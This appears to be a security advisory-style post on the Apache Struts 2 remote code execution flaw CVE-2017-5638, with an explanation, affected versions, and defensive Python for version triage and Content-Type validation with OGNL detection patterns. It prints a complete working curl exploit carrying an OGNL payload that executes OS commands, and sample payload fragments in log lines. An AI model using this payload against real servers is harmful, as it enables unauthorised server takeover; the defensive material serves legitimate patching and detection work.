Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical Remote Code Execution flaw stemming from flawed error handling in the framework’s Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a Struts endpoint. If the header value is invalid, an exception is thrown, and the error message is constructed using the user-supplied input from the header. Before the exception is handled, the input is evaluated by the Object-Graph Navigation Language (OGNL) interpreter. An attacker can embed OGNL expressions within the `Content-Type` header. Because of the flawed exception handling mechanism, these expressions are executed on the server side with full application privileges. This allows the attacker to achieve remote code execution, enabling them to run arbitrary system commands, exfiltrate data, or gain complete control over the vulnerable server. The attack is particularly dangerous because it is easy to exploit and does not require authentication, making any exposed Struts application a prime target.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch released 2017-03-07
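As an added triage aid that is not part of the original post: a small Python helper that checks a reported Struts 2 version string against the affected ranges listed above and names the fix release. The inventory entries in the block are constructed sample data, not real hosts.

```python
# Added example, not from the original post: triage a fleet of Struts 2
# installs against the affected ranges given above.
#   affected: 2.3.5 - 2.3.31 (fix 2.3.32) and 2.5 - 2.5.10 (fix 2.5.10.1)
# Versions are compared as integer tuples so that the four-part fix release
# 2.5.10.1 sorts after 2.5.10 and is correctly treated as patched.

AFFECTED_RANGES = [
    # (first affected, last affected, fix release); ranges are inclusive
    ((2, 3, 5), (2, 3, 31), "2.3.32"),
    ((2, 5), (2, 5, 10), "2.5.10.1"),
]

# Constructed sample inventory: (hostname, reported Struts version).
SAMPLE_INVENTORY = [
    ("app-01.example.internal", "2.3.31"),
    ("app-02.example.internal", "2.5.10"),
    ("app-03.example.internal", "2.5.10.1"),
    ("app-04.example.internal", "2.3.32"),
]


def parse_version(text):
    """Turn '2.5.10.1' into (2, 5, 10, 1); reject anything that is not dotted integers."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a numeric version string: {text!r}")
    return tuple(int(p) for p in parts)


def recommended_fix(version):
    """Return the fix release for an affected version, or None if it is not affected."""
    v = parse_version(version)
    for low, high, fix in AFFECTED_RANGES:
        if low <= v <= high:
            return fix
    return None


def is_affected(version):
    return recommended_fix(version) is not None


def triage(inventory):
    """Return [(host, version, fix)] for every inventory entry that still needs patching."""
    return [(host, ver, recommended_fix(ver)) for host, ver in inventory if is_affected(ver)]


if __name__ == "__main__":
    for host, ver, fix in triage(SAMPLE_INVENTORY):
        print(f"{host}: Struts {ver} is affected by CVE-2017-5638, upgrade to {fix}")
```

Tuple comparison does the right thing for the maintenance release: `(2, 5, 10, 1)` sorts above `(2, 5, 10)`, so 2.5.10.1 is outside the affected range while 2.5.10 itself is inside it.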

What Undercode Says:

```sh
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target.com/struts2-endpoint
```

How the Exploit Works:

A crafted HTTP request carries the OGNL payload in its Content-Type header and is sent to an endpoint handled by the file upload (multipart) parser. The payload bypasses the framework's OGNL security restrictions and then executes OS commands. Tools such as `struts-pwn` automate this attack.

Protection from this CVE:

Upgrade immediately to Struts 2.3.32 or 2.5.10.1. Add WAF rules that block requests whose Content-Type header contains OGNL expression syntax. Restrict unnecessary network access to Struts applications.
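The following Python is an added example, not code from the original post or from the Struts project. It shows the two checks a defender would want for this header vector: a strict allowlist validation of Content-Type against the RFC 7231 media-type grammar, which rejects OGNL syntax without having to enumerate payload patterns, and a blocklist match on OGNL markers for detection. Both are run over constructed access-log lines; the log format, the sample lines and the client addresses are assumptions made for this example.

```python
# Added example, not from the original post: allowlist validation of the
# Content-Type header plus OGNL-marker detection over constructed log lines.
import re

# --- allowlist: media-type grammar of RFC 7231, token grammar of RFC 7230 ---
# tchar is any printable ASCII except separators such as ( ) { } ; = , " and
# space, so an OGNL expression like %{(#_='...')} can never parse as a token.
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_QUOTED = r'"[^"]*"'
_PARAM = rf"{_TOKEN}=(?:{_TOKEN}|{_QUOTED})"
_MEDIA_TYPE = re.compile(rf"^{_TOKEN}/{_TOKEN}(?:\s*;\s*{_PARAM})*\s*$")

# --- blocklist: hallmarks of an OGNL expression smuggled into a header ---
_OGNL_MARKERS = re.compile(r"%\{|\$\{|@[A-Za-z_][\w.]*@|#_memberAccess|ProcessBuilder")


def validate_content_type(value):
    """Allowlist check: True only for a syntactically valid media type of sane length."""
    if not value or len(value) > 256:  # no legitimate Content-Type is this long
        return False
    return _MEDIA_TYPE.match(value) is not None


def looks_like_ognl(value):
    """Blocklist check: True if the value carries OGNL expression syntax."""
    return _OGNL_MARKERS.search(value) is not None


# Constructed sample access log (format assumed for this example):
#   <client ip> <method> <path> "<Content-Type request header>"
SAMPLE_LOG = [
    '203.0.113.7 POST /upload.action "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"',
    '203.0.113.8 POST /upload.action "%{(#_=\'multipart/form-data\').(#cmd=\'whoami\')}"',
    '203.0.113.9 GET /index.action "application/x-www-form-urlencoded"',
    '203.0.113.10 POST /upload.action "${@java.lang.System@getProperty(\'os.name\')}"',
    '203.0.113.11 POST /upload.action "multipart/form-data; boundary=(not a token)"',
    'this line is not in the expected format',
]
_LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) "(.*)"$')


def scan_access_log(lines):
    """Return (client_ip, path, reason) for every request whose Content-Type should have been blocked."""
    findings = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the whole scan
        ip, _method, path, ctype = m.groups()
        if looks_like_ognl(ctype):
            findings.append((ip, path, "ognl-expression-in-content-type"))
        elif not validate_content_type(ctype):
            findings.append((ip, path, "malformed-content-type"))
    return findings


if __name__ == "__main__":
    for ip, path, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```

The allowlist is the stronger control: the last flagged line carries no OGNL marker at all, yet it is still rejected because `(` cannot appear unquoted in a parameter value. A WAF signature alone would miss it, while a browser-generated boundary such as `----WebKitFormBoundary7MA4YWxk` passes unchanged.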

Impact:

Full server compromise: arbitrary command execution, data breach and theft, and complete system access for the attacker.


Sources:

Reported By: nvd.nist.gov